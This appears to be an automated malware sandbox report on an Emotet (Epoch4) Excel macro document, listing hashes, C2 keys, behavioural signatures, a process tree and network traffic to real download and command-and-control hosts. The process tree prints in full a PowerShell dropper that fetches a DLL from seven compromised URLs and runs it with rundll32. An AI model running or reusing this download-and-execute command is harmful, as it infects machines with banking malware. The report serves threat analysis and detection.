
Resubmissions

24/11/2021, 17:59 UTC

211124-wk8rgsddbm 10

22/11/2021, 14:46 UTC

211122-r5n6csagd6 10

22/11/2021, 14:46 UTC

211122-r5csbsfgdp 10

22/11/2021, 14:44 UTC

211122-r4kfsafgdn 10

22/11/2021, 14:41 UTC

211122-r2x9vsfgcq 10

22/11/2021, 14:20 UTC

211122-rneklaffgr 10

22/11/2021, 14:15 UTC

211122-rkk8zaffgl 10

17/11/2021, 06:51 UTC

211117-hm1l1aeefm 10

17/11/2021, 06:37 UTC

211117-hdnk3seedn 10

Analysis

  • max time kernel
    49s
  • max time network
    57s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    17/11/2021, 06:51 UTC

General

  • Target

    865663204559_17_Nov_2021.xlsm

  • Size

    44KB

  • MD5

    477fd718bb764ffe3c5afde16c6c8dd2

  • SHA1

    eb932e19d95f88d64270d40cdc0b92c6d1cf63be

  • SHA256

    ee880ebdf26a1bcebe70a7ba17659199833c6107d758e26d37502bed9a225ee3

  • SHA512

    f7d0451ca3670179cc93a680b99f8982204c43054c55eb479c38dc8ea0ba6ba5b6ebea4508569091c07d95a759841455605e6daeab445146b29fc1af377ba267

Malware Config

Extracted

Family

emotet

Botnet

Epoch4

C2

eck1.plain

-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw
TyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==
-----END PUBLIC KEY-----

ecs1.plain

-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov
pqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==
-----END PUBLIC KEY-----

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 16 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\865663204559_17_Nov_2021.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3152
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $dfkj="$strs=\"https://evgeniys.ru/sap-logs/D6/,http://crownadvertising.ca/wp-includes/OxiAACCoic/,https://cars-taxonomy.mywebartist.eu/-/BPCahsAFjwF/,http://immoinvest.com.br/blog_old/wp-admin/luoT/,https://yoho.love/wp-content/e4laFBDXIvYT6O/,https://www.168801.xyz/wp-content/6J3CV4meLxvZP/,https://www.pasionportufuturo.pe/wp-content/XUBS/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4744
        • C:\Windows\SysWow64\rundll32.exe
          "C:\Windows\SysWow64\rundll32.exe" C:\ProgramData\37926850.dll,f1541763150
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:4336
          • C:\Windows\SysWOW64\rundll32.exe
            C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\37926850.dll",Control_RunDLL
            5⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:3768
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vhhcsaycitojwot\zymfkff.jad",bgoHsrDVNbITvy
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1220
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Vhhcsaycitojwot\zymfkff.jad",Control_RunDLL
                7⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                PID:3788

Network

  • flag-us
    DNS
    time.windows.com
    Remote address:
    8.8.8.8:53
    Request
    time.windows.com
    IN A
    Response
    time.windows.com
    IN CNAME
    twc.trafficmanager.net
    twc.trafficmanager.net
    IN A
    20.101.57.9
  • flag-us
    DNS
    evgeniys.ru
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    evgeniys.ru
    IN A
    Response
    evgeniys.ru
    IN A
    159.253.18.185
  • flag-ee
    GET
    https://evgeniys.ru/sap-logs/D6/
    powershell.exe
    Remote address:
    159.253.18.185:443
    Request
    GET /sap-logs/D6/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
    Host: evgeniys.ru
    Connection: Keep-Alive
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx/1.20.1
    Date: Wed, 17 Nov 2021 06:52:32 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 157
    Connection: keep-alive
  • flag-us
    DNS
    ts-crl.ws.symantec.com
    Remote address:
    8.8.8.8:53
    Request
    ts-crl.ws.symantec.com
    IN A
    Response
    ts-crl.ws.symantec.com
    IN CNAME
    crl-symcprod.digicert.com
    crl-symcprod.digicert.com
    IN CNAME
    cs9.wac.phicdn.net
    cs9.wac.phicdn.net
    IN A
    72.21.91.29
  • flag-us
    GET
    http://ts-crl.ws.symantec.com/sha256-tss-ca.crl
    Remote address:
    72.21.91.29:80
    Request
    GET /sha256-tss-ca.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: ts-crl.ws.symantec.com
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Age: 1880
    Cache-Control: public, max-age=3600
    Content-Type: application/pkix-crl
    Date: Wed, 17 Nov 2021 06:52:33 GMT
    Last-Modified: Wed, 17 Nov 2021 06:21:13 GMT
    Server: ECS (bsa/EB1D)
    X-Cache: HIT
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
    Content-Length: 502
  • flag-us
    DNS
    crownadvertising.ca
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    crownadvertising.ca
    IN A
    Response
    crownadvertising.ca
    IN A
    209.124.90.7
  • flag-us
    GET
    http://crownadvertising.ca/wp-includes/OxiAACCoic/
    powershell.exe
    Remote address:
    209.124.90.7:80
    Request
    GET /wp-includes/OxiAACCoic/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.0
    Host: crownadvertising.ca
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Wed, 17 Nov 2021 06:58:52 GMT
    Server: Apache
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Expires: Wed, 17 Nov 2021 06:58:52 GMT
    Content-Disposition: attachment; filename="UodrR7fwzu3RaDkTn.dll"
    Content-Transfer-Encoding: binary
    Set-Cookie: 6194a82caa433=1637132332; expires=Wed, 17-Nov-2021 06:59:52 GMT; Max-Age=60; path=/
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
    Last-Modified: Wed, 17 Nov 2021 06:58:52 GMT
    Keep-Alive: timeout=5, max=100
    Transfer-Encoding: chunked
    Content-Type: application/x-msdownload
  • flag-pl
    GET
    https://91.200.186.228/ZwqheMGTjywOmezAEJyQMYEIaGCEdGjncIyGWaNllKBZDtiZIcONKPhTpbnUT
    rundll32.exe
    Remote address:
    91.200.186.228:443
    Request
    GET /ZwqheMGTjywOmezAEJyQMYEIaGCEdGjncIyGWaNllKBZDtiZIcONKPhTpbnUT HTTP/1.1
    Cookie: pujJXuQIqQvUyNh=QOnrrbCCgj3Zmq9aewBzkVddnIe84nKDTvhWWhFcNgMMFLE/1AACS61XfAQ4fVvIzN6X6lkgqneC60SkUqPiOHHzAwKx5T2wU2D3AXnAp/Gn03CvOGz6woR4G+g0QwB1aVzUc0fUEQmpZGkeGWsnYa9yQiVccY44iQNtKGDUDkMrZ65MxmzwuNA5lRBHD/iSX6pRwN06wpucZlS7E97BjIkc6rLbHBuhTwDBMXwqBgEPw8tDoWPSzoSJWkdALbwlm9UmhtviM3mFCXVN69tbIbiqu3HlTu9aCaSPzfKhkMat6bDiID6aKfH+DmtX8m5+UcNvPmUvIPn+UTrMxYnJY8F0bN6kJq/swEM=
    Host: 91.200.186.228
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx
    Date: Wed, 17 Nov 2021 06:52:45 GMT
    Content-Type: text/html
    Content-Length: 173
    Connection: keep-alive
  • flag-br
    GET
    https://191.252.196.221:8080/VzfLTULjpgjdGOpXxvzbayGhToI
    rundll32.exe
    Remote address:
    191.252.196.221:8080
    Request
    GET /VzfLTULjpgjdGOpXxvzbayGhToI HTTP/1.1
    Cookie: DzzDqZx=QOnrrbCCgj3Zmq9aewBzkVddnIe84nKDTvhWWhFcNgMMFLE/1AACS61XfAQ4fVvIzN6X6lkgqneC60SkUqPiOHHzAwKx5T2wU2D3AXnAp/Gn03CvOGz6woR4G+g0QwB1aVzUc0fUEQmpZGkeGWsnYa9yQiVccY44iQNtKGDUDkMrZ65MxmzwuNA5lRBHD/iSX6pRwN06wpucZlS7E97BjPcG5MDpBJsAoBqk6icayhmgkD4q4w==
    Host: 191.252.196.221:8080
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx
    Date: Wed, 17 Nov 2021 06:51:52 GMT
    Content-Type: text/html
    Content-Length: 173
    Connection: keep-alive
  • flag-gb
    GET
    https://94.177.248.64/nwzJidAUAVAeHLIpvhKbMiHEJeLdTwAE
    rundll32.exe
    Remote address:
    94.177.248.64:443
    Request
    GET /nwzJidAUAVAeHLIpvhKbMiHEJeLdTwAE HTTP/1.1
    Cookie: FgivrmzWJKd=QOnrrbCCgj3Zmq9aewBzkVddnIe84nKDTvhWWhFcNgMMFLE/1AACS61XfAQ4fVvIzN6X6lkgqneC60SkUqPiOHHzAwKx5T2wU2D3AXnAp/Gn03CvOGz6woR4G+g0QwB1aVzUc0fUEQmpZGkeGWsnYa9yQiVccY44iQNtKGDUDkMrZ65MxmzwuNA5lRBHD/iSX6pRwN06wpucZlS7E97BjNt78WQf8wC8OsWiiSGKbxoNz5Mlyr80s4Y6Nqwad9s4c3lHlEIYegVe7q7BZWzJEigMS6UH8AYqSzJWDSt0wpMnNPL+3mM+UvURhnwFPnp7+9SAQquV/d3wChvMNGg=
    Host: 94.177.248.64
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx
    Date: Wed, 17 Nov 2021 06:52:46 GMT
    Content-Type: text/html
    Content-Length: 173
    Connection: keep-alive
  • flag-sg
    GET
    https://66.42.55.5:7080/QeIeYUtyTnocpQaogwVYwNDZpf
    rundll32.exe
    Remote address:
    66.42.55.5:7080
    Request
    GET /QeIeYUtyTnocpQaogwVYwNDZpf HTTP/1.1
    Cookie: gnSXtrLhrUf=QOnrrbCCgj3Zmq9aewBzkVddnIe84nKDTvhWWhFcNgMMFLE/1AACS61XfAQ4fVvIzN6X6lkgqneC60SkUqPiOHHzAwKx5T2wU2D3AXnAp/Gn03CvOGz6woR4G+g0QwB1aVzUc0fUEQmpZGkeGWsnYa9yQiVccY44iQNtKGDUDkMrZ65MxmzwuNA5lRBHD/iSX6pRwN06wpucZlS7E97BjM2vr+Mi8Yn+w3gvze0AQh0JQETMm513IoVH00VyHAKr0eTLAwvRxymVTSe5LsLFspJeogi/mFcTATZHuW4jl3eXLWKnTWMrVObkfVUhghs9N9jfEWhx
    Host: 66.42.55.5:7080
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx
    Date: Wed, 17 Nov 2021 06:52:48 GMT
    Content-Type: text/html
    Content-Length: 173
    Connection: keep-alive
  • flag-my
    GET
    https://103.8.26.103:8080/NxdmDoEmPqWQPqCHdmrcwKhyykYxYPospVRTNMNWfCwZiicPoMXmLHdcLdGLz
    rundll32.exe
    Remote address:
    103.8.26.103:8080
    Request
    GET /NxdmDoEmPqWQPqCHdmrcwKhyykYxYPospVRTNMNWfCwZiicPoMXmLHdcLdGLz HTTP/1.1
    Cookie: JuI=QOnrrbCCgj3Zmq9aewBzkVddnIe84nKDTvhWWhFcNgMMFLE/1AACS61XfAQ4fVvIzN6X6lkgqneC60SkUqPiOHHzAwKx5T2wU2D3AXnAp/Gn03CvOGz6woR4G+g0QwB1aVzUc0fUEQmpZGkeGWsnYa9yQiVccY44iQNtKGDUDkMrZ65MxmzwuNA5lRBHD/iSX6pRwN06wpucZlS7E97BjCj3aA6LOuLM1jIAZc7GTdUEU2Cygzvd4aEtSlrDoIbHE2ra+xGUnrSSstwfqiBCKtJ4Y0eMatw=
    Host: 103.8.26.103:8080
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx
    Date: Wed, 17 Nov 2021 06:49:19 GMT
    Content-Type: text/html
    Content-Length: 173
    Connection: keep-alive
  • flag-tr
    GET
    https://185.184.25.237:8080/bbvnXhazGBzueQrEphcDhqZugMEeSWSbxGSeokqg
    rundll32.exe
    Remote address:
    185.184.25.237:8080
    Request
    GET /bbvnXhazGBzueQrEphcDhqZugMEeSWSbxGSeokqg HTTP/1.1
    Cookie: ZNVjOb=QOnrrbCCgj3Zmq9aewBzkVddnIe84nKDTvhWWhFcNgMMFLE/1AACS61XfAQ4fVvIzN6X6lkgqneC60SkUqPiOHHzAwKx5T2wU2D3AXnAp/Gn03CvOGz6woR4G+g0QwB1aVzUc0fUEQmpZGkeGWsnYa9yQiVccY44iQNtKGDUDkMrZ65MxmzwuNA5lRBHD/iSX6pRwN06wpucZlS7E97BjGPihGGwSiSLACRn9RRbzOPNAQhwcBG2HgcDvMfDWtOZ4Nhv7qMm/59RB+Qp7NunqVW1m60BXwUDtadMtSplWxed8i95E6tIGM/BS+TQV2gyNyOnYPg+nc9zF5qlVPAnYgRRnfzlfFpdAzCFI8MZl+uaFQpZH+dXFQNevi4kbQ==
    Host: 185.184.25.237:8080
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx
    Date: Wed, 17 Nov 2021 06:42:54 GMT
    Content-Type: text/html
    Content-Length: 173
    Connection: keep-alive
  • flag-my
    GET
    https://103.8.26.102:8080/EmBcaBdTElzGHNGhHQznSSJTeXNLqkjGhyKZfkWTJfbMxYEXW
    rundll32.exe
    Remote address:
    103.8.26.102:8080
    Request
    GET /EmBcaBdTElzGHNGhHQznSSJTeXNLqkjGhyKZfkWTJfbMxYEXW HTTP/1.1
    Cookie: JFWoEQUIXvl=QOnrrbCCgj3Zmq9aewBzkVddnIe84nKDTvhWWhFcNgMMFLE/1AACS61XfAQ4fVvIzN6X6lkgqneC60SkUqPiOHHzAwKx5T2wU2D3AXnAp/Gn03CvOGz6woR4G+g0QwB1aVzUc0fUEQmpZGkeGWsnYa9yQiVccY44iQNtKGDUDkMrZ65MxmzwuNA5lRBHD/iSX6pRwN06wpucZlS7E97BjLgAzyV2ejz3DPVRoGdTBelOs74qJh/6IISv36ABW5nDxXDiHIGhToU/r6s=
    Host: 103.8.26.102:8080
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 502 Bad Gateway
    Server: nginx
    Date: Wed, 17 Nov 2021 06:49:21 GMT
    Content-Type: text/html
    Content-Length: 173
    Connection: keep-alive
  • 159.253.18.185:443
    https://evgeniys.ru/sap-logs/D6/
    tls, http
    powershell.exe
    856 B
    5.4kB
    9
    8

    HTTP Request

    GET https://evgeniys.ru/sap-logs/D6/

    HTTP Response

    502
  • 72.21.91.29:80
    http://ts-crl.ws.symantec.com/sha256-tss-ca.crl
    http
    324 B
    996 B
    4
    3

    HTTP Request

    GET http://ts-crl.ws.symantec.com/sha256-tss-ca.crl

    HTTP Response

    200
  • 209.124.90.7:80
    http://crownadvertising.ca/wp-includes/OxiAACCoic/
    http
    powershell.exe
    4.7kB
    266.8kB
    99
    187

    HTTP Request

    GET http://crownadvertising.ca/wp-includes/OxiAACCoic/

    HTTP Response

    200
  • 91.200.186.228:443
    https://91.200.186.228/ZwqheMGTjywOmezAEJyQMYEIaGCEdGjncIyGWaNllKBZDtiZIcONKPhTpbnUT
    tls, http
    rundll32.exe
    1.3kB
    2.3kB
    10
    8

    HTTP Request

    GET https://91.200.186.228/ZwqheMGTjywOmezAEJyQMYEIaGCEdGjncIyGWaNllKBZDtiZIcONKPhTpbnUT

    HTTP Response

    502
  • 191.252.196.221:8080
    https://191.252.196.221:8080/VzfLTULjpgjdGOpXxvzbayGhToI
    tls, http
    rundll32.exe
    1.1kB
    2.3kB
    10
    8

    HTTP Request

    GET https://191.252.196.221:8080/VzfLTULjpgjdGOpXxvzbayGhToI

    HTTP Response

    502
  • 94.177.248.64:443
    https://94.177.248.64/nwzJidAUAVAeHLIpvhKbMiHEJeLdTwAE
    tls, http
    rundll32.exe
    1.2kB
    2.3kB
    10
    8

    HTTP Request

    GET https://94.177.248.64/nwzJidAUAVAeHLIpvhKbMiHEJeLdTwAE

    HTTP Response

    502
  • 66.42.55.5:7080
    https://66.42.55.5:7080/QeIeYUtyTnocpQaogwVYwNDZpf
    tls, http
    rundll32.exe
    1.2kB
    2.3kB
    10
    8

    HTTP Request

    GET https://66.42.55.5:7080/QeIeYUtyTnocpQaogwVYwNDZpf

    HTTP Response

    502
  • 103.8.26.103:8080
    https://103.8.26.103:8080/NxdmDoEmPqWQPqCHdmrcwKhyykYxYPospVRTNMNWfCwZiicPoMXmLHdcLdGLz
    tls, http
    rundll32.exe
    1.2kB
    2.3kB
    10
    8

    HTTP Request

    GET https://103.8.26.103:8080/NxdmDoEmPqWQPqCHdmrcwKhyykYxYPospVRTNMNWfCwZiicPoMXmLHdcLdGLz

    HTTP Response

    502
  • 185.184.25.237:8080
    https://185.184.25.237:8080/bbvnXhazGBzueQrEphcDhqZugMEeSWSbxGSeokqg
    tls, http
    rundll32.exe
    1.3kB
    2.3kB
    10
    8

    HTTP Request

    GET https://185.184.25.237:8080/bbvnXhazGBzueQrEphcDhqZugMEeSWSbxGSeokqg

    HTTP Response

    502
  • 103.8.26.102:8080
    https://103.8.26.102:8080/EmBcaBdTElzGHNGhHQznSSJTeXNLqkjGhyKZfkWTJfbMxYEXW
    tls, http
    rundll32.exe
    1.2kB
    2.3kB
    10
    8

    HTTP Request

    GET https://103.8.26.102:8080/EmBcaBdTElzGHNGhHQznSSJTeXNLqkjGhyKZfkWTJfbMxYEXW

    HTTP Response

    502
  • 178.79.147.66:8080
    rundll32.exe
    156 B
    120 B
    3
    3
  • 58.227.42.236:80
    rundll32.exe
    156 B
    120 B
    3
    3
  • 45.118.135.203:7080
    rundll32.exe
    156 B
    120 B
    3
    3
  • 103.75.201.2:443
    rundll32.exe
    156 B
    120 B
    3
    3
  • 195.154.133.20:443
    rundll32.exe
    156 B
    120 B
    3
    3
  • 45.142.114.231:8080
    rundll32.exe
    156 B
    3
  • 8.8.8.8:53
    time.windows.com
    dns
    62 B
    114 B
    1
    1

    DNS Request

    time.windows.com

    DNS Response

    20.101.57.9

  • 20.101.57.9:123
    time.windows.com
    ntp
    152 B
    2
  • 8.8.8.8:53
    evgeniys.ru
    dns
    powershell.exe
    57 B
    73 B
    1
    1

    DNS Request

    evgeniys.ru

    DNS Response

    159.253.18.185

  • 8.8.8.8:53
    ts-crl.ws.symantec.com
    dns
    68 B
    152 B
    1
    1

    DNS Request

    ts-crl.ws.symantec.com

    DNS Response

    72.21.91.29

  • 8.8.8.8:53
    crownadvertising.ca
    dns
    powershell.exe
    65 B
    81 B
    1
    1

    DNS Request

    crownadvertising.ca

    DNS Response

    209.124.90.7

Downloads

  • memory/3152-120-0x000002713B700000-0x000002713B702000-memory.dmp

    Filesize

    8KB

  • memory/3152-119-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

    Filesize

    64KB

  • memory/3152-122-0x000002713B700000-0x000002713B702000-memory.dmp

    Filesize

    8KB

  • memory/3152-115-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

    Filesize

    64KB

  • memory/3152-116-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

    Filesize

    64KB

  • memory/3152-117-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

    Filesize

    64KB

  • memory/3152-118-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

    Filesize

    64KB

  • memory/3152-121-0x000002713B700000-0x000002713B702000-memory.dmp

    Filesize

    8KB

  • memory/4336-340-0x0000000010000000-0x0000000010028000-memory.dmp

    Filesize

    160KB

  • memory/4744-310-0x0000024913CB8000-0x0000024913CB9000-memory.dmp

    Filesize

    4KB

  • memory/4744-294-0x0000024913CB6000-0x0000024913CB8000-memory.dmp

    Filesize

    8KB

  • memory/4744-292-0x0000024913CB0000-0x0000024913CB2000-memory.dmp

    Filesize

    8KB

  • memory/4744-293-0x0000024913CB3000-0x0000024913CB5000-memory.dmp

    Filesize

    8KB